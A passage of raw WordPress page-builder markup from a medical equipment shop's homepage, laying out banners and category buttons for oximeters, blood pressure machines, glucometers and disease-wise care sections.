content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column][vc_btn title=”NEW PRODUCTS AND SERVICES” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” custom_onclick=”true” css=”.vc_custom_1628312071553{border-radius: 4px !important;}” link=”url:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fnew-products-offers%2F|title:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fnew-products-offers%2F|target:_blank” custom_onclick_code=”https:\/\/avanmedibazar.com\/product-category\/new-products-offers\/”][\/vc_column][vc_column width=”1\/3″ mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_sticky_column=”false” parallax_scroll=”no” mobile_reset_margin=”no” tablet_reset_margin=”no”][vc_row_inner][vc_column_inner]\n\t\t<div id=\"wd-60b1f196b137e\" class=\"title-wrapper woodmart-title-color-default woodmart-title-style-underlined woodmart-title-width-100 text-center woodmart-title-size-default \">\n\t\t\t\n\t\t\t<div class=\"liner-continer\">\n\t\t\t\t<span class=\"left-line\"><\/span>\n\t\t\t\t<h4 class=\"woodmart-title-container title woodmart-font-weight-600\" >Innovative Technology<\/h4>\t\t\t\t\t\t\t\t<span class=\"right-line\"><\/span>\n\t\t\t<\/div>\n\t\t\t\n\t\t\t\n\t\t\t\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-610e54b09d5e7\" class=\"promo-banner banner-vr-align-bottom banner-hr-align-center banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default banner-increased-padding cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/fitness-tracker\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/07\/as81-vio-1-1-150x150.png\" width=\"150\" height=\"150\" alt=\"as81-vio-\" title=\"as81-vio-\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-center content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><h4 class=\"banner-title woodmart-font-weight-500\">Fitness Tracker (Made In Germany)<\/h4><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=”2\/3″ mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_sticky_column=”false” parallax_scroll=”no” mobile_reset_margin=”no” tablet_reset_margin=”no”][vc_row_inner][vc_column_inner]\n\t\t<div id=\"wd-60b1f1a423067\" class=\"title-wrapper woodmart-title-color-default woodmart-title-style-underlined woodmart-title-width-100 text-center woodmart-title-size-default \">\n\t\t\t\n\t\t\t<div class=\"liner-continer\">\n\t\t\t\t<span class=\"left-line\"><\/span>\n\t\t\t\t<h4 class=\"woodmart-title-container title woodmart-font-weight-600\" >Best Offers<\/h4>\t\t\t\t\t\t\t\t<span class=\"right-line\"><\/span>\n\t\t\t<\/div>\n\t\t\t\n\t\t\t\n\t\t\t\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/2″]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-60f81300eedec\" class=\"promo-banner banner-vr-align-bottom banner-hr-align-center banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/05\/po30-BeurerGrmanayImage-1-150x150.png\" width=\"150\" height=\"150\" alt=\"Emergency Oxygen Care\" title=\"Pulse Oxymeter Germany\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-center content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><h4 class=\"banner-title woodmart-font-weight-500\">Pulse Oximeter (Germany)<\/h4><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][vc_column_inner width=”1\/2″]\t\t<div class=\"promo-banner-wrapper\">\n\t\t\t<div id=\"wd-611a0ad8377d0\" class=\"promo-banner banner-vr-align-bottom banner-hr-align-center banner- banner-hover-zoom color-scheme-light banner-btn-size-default banner-btn-style-default cursor-pointer\" onclick=\"window.location.href='https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/'\" >\n\n\t\t\t\t<div class=\"main-wrapp-img\">\n\t\t\t\t\t<div class=\"banner-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img class=\"promo-banner-image image-1 \" src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2021\/08\/OMRON-SMART-ELITE-HEM-7600T.-750-pixel-150x150.png\" width=\"150\" height=\"150\" alt=\"OMRON SMART ELITE+ HEM-7600T. (750 pixel)\" title=\"OMRON SMART ELITE+ HEM-7600T. (750 pixel)\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\n\t\t\t\t<div class=\"wrapper-content-banner \">\n\t\t\t\t\t<div class=\"content-banner text-center content-width-100\">\n\t\t\t\t\t\t\t<div class=\"banner-title-wrap banner-title-default\"><h4 class=\"banner-title woodmart-font-weight-\">Digital Blood Pressure Machine<\/h4><\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\n\t\t[\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css=”.vc_custom_1621842235285{padding-bottom: 50px !important;}” mobile_bg_img_hidden=”no” tablet_bg_img_hidden=”no” woodmart_parallax=”0″ woodmart_gradient_switch=”no” row_reverse_mobile=”0″ row_reverse_tablet=”0″ woodmart_disable_overflow=”0″][vc_column][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Best Selling Products” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623303151753{border-radius: 5px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd84ac64a79\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/nebulizaer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/nebulizaer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Nebulizer<\/a><\/div>[vc_single_image image=”4749″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/nebulizaer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd88c0a3ab7\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Pulse Oximeter<\/a><\/div>[vc_single_image image=”2974″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd84f499f8c\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Glucometer<\/a><\/div>[vc_single_image image=”4751″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cef7b59b3c7\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">BP Machine<\/a><\/div>[vc_single_image image=”5485″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd7d1b18d97\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Oxygen Concentrator<\/a><\/div>[vc_single_image image=”4083″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/oxygen-concentrator\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61137d4157c18\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Weight Scale<\/a><\/div>[vc_single_image image=”5455″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cefac6c54b5\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/wheel-chair\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/wheel-chair\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Wheel Chair<\/a><\/div>[vc_single_image image=”5451″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/wheel-chair\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610fb7ee43f6b\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">INFRARED THERMOMETER<\/a><\/div>[vc_single_image image=”4363″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Doctor’s Recommended Products” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1627459227696{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-612388eadffc3\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/fitness-tracker\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/fitness-tracker\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Fitness Tracker<\/a><\/div>[vc_single_image image=”5189″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/fitness-tracker\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd969e825ee\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/digital-bp-machine\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/digital-bp-machine\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">DIGITAL BP MACHINE<\/a><\/div>[vc_single_image image=”5489″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/bp-machine-blood-pressure-machine\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610e5e27a4f5b\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">PULSE OXIMETER<\/a><\/div>[vc_single_image image=”2974″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/pulse-oximeter\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cd9705bb98f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">GLUCOSE METER<\/a><\/div>[vc_single_image image=”4765″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/glucose-meter-and-stripes\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610e5df5792cb\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Infrared Thermometer<\/a><\/div>[vc_single_image image=”4777″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/infrared-thermometer\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61179b55a9cbf\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ORTHOPEDIC HEATING BELT<\/a><\/div>[vc_single_image image=”5467″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-610e5e385e767\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Weighing Scale<\/a><\/div>[vc_single_image image=”4752″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/weighting-scale\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61347871f3256\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/air-mattress\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/air-mattress\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">AIR MATTRESS<\/a><\/div>[vc_single_image image=”5168″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/air-mattress\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Diseases Wise Healthcare Products” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1622739533196{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6e881e4f42\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/cardiac-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/cardiac-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Cardiac Care<\/a><\/div>[vc_single_image image=”4023″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/artificial-heart-valve\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6e85b543b3\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/cancer-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/cancer-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Cancer Care<\/a><\/div>[vc_single_image image=”4029″ img_size=”full” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/cancer-care\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-6106495846693\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/diabetic-store\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Diabetic Care<\/a><\/div>[vc_single_image image=”4041″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/accu-chek-active-blood-glucose-meter\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f1daa8960\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/dental-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/dental-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Dental Care<\/a><\/div>[vc_single_image image=”4046″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product-category\/health-care\/dental-care\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f2e376d14\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/orthopedic-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Orthopedic Care<\/a><\/div>[vc_single_image image=”4057″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product\/orthopedic-heating-belt\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f333a07b3\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/eye-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/eye-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Eye Care<\/a><\/div>[vc_single_image image=”4060″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/heine-beta-200s-led-ophthalmoscope-set-with-usb-rechargeable-handle\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-61079b1534b6b\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/mother-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/mother-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Mother Care<\/a><\/div>[vc_single_image image=”5346″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/beurer-electric-breast-pump\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60cef33ab26a3\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/neurocare\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/health-care\/neurocare\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Stroke Care<\/a><\/div>[vc_single_image image=”4068″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/ft-stroke-hemiplegic-walking-frame-standing-walker-six-wheeled-adult-rehabilitation-equipment-color-blue\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f474b39ed\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Physiotherapy Care<\/a><\/div>[vc_single_image image=”4072″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” link=”https:\/\/avanmedibazar.com\/product-category\/physiotherapy-care\/” parallax_scroll=”no”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f4be0d1ea\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/skin-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Skin Care<\/a><\/div>[vc_single_image image=”4075″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/vein-finder-navi60-by-medcaptain\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f51949985\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/ent-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/ent-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">ENT Care<\/a><\/div>[vc_single_image image=”4079″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/hearing-amplifier-ha-50-beurer-germany\/”][\/vc_column_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60c6f5646e87f\" class=\"woodmart-button-wrapper text-center\"><a href=\"https:\/\/avanmedibazar.com\/product-category\/respiratory-care\/\" title=\"https:\/\/avanmedibazar.com\/product-category\/respiratory-care\/\" target=\"_blank\" class=\"btn btn-scheme-light btn-scheme-hover-light btn-style-default btn-shape-rectangle btn-size-default btn-full-width\">Respiratory Care<\/a><\/div>[vc_single_image image=”4083″ img_size=”medium” alignment=”center” style=”vc_box_border” border_color=”sky” onclick=”custom_link” img_link_target=”_blank” parallax_scroll=”no” link=”https:\/\/avanmedibazar.com\/product\/aerti-am-2-oxygen-concentrator-2-9-liter-min\/”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”HEALTH & BEAUTY CARE” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1627460461798{border-radius: 4px !important;}” link=”url:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fhealth-and-beauty%2F|title:https%3A%2F%2Favanmedibazar.com%2Fproduct-category%2Fhealth-and-beauty%2F|target:_blank”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=”1\/4″ offset=”vc_col-xs-6″]<div id=\"wd-60e5958a387af\" class=\"woodmart-button-wrapper text-center\"><a 